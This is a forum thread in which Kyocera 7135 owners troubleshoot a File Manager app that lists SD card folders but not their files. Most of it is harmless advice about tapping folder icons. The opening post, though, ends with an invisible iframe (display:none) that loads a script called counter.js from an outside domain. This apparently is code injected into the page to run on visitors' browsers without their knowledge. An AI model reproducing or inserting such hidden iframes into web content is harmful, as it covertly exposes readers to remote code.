+ Reply to Thread

File Manager trouble ?

Had my 7135 for several days and installed a 128 Mb. SD card. File manager will only show the top level directories, but will not show any files contained in those directories. Filez shows everything! The card was formatted in the phone. Anybody had a similar experience?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Never involved in a flame war! sputnik's Avatar
    i was able to go from the root of the card to the Audio directory, see my mp3s, then go back up and then down into /PALM/Backup, where FileManager just finished sorting my backup buddy files

can you do that?
    _______
    Spu|nik VZW Kyo 7135 / VZW XV6600 / Sprint Mogul / Sprint Touch Pro / Sprint Touch Pro 2 / Apple iPhone 4 / ???

Yeah, this was a major trial/error for me. You have to click on the actual folder icon to go into a directory. Clicking the name only highlights it. I didn't read the manual; does it say this?

Now you tell me

Son-of-a-*****!

LOL
    iPhone therefore iAm.

Originally posted by KLiuLess
    You have to click on the actual folder icon to go into a directory. Clicking the name only highlights it.
    I'm a little confused... are you talking about file manager or backupbuddy? 'cause file manager has no folder icons.

T

Originally posted by liltiki
    I'm a little confused... are you talking about file manager or backupbuddy? 'cause file manager has no folder icons.

T
    File manager. It will on the external card only....IF there are folders of course.
    iPhone therefore iAm.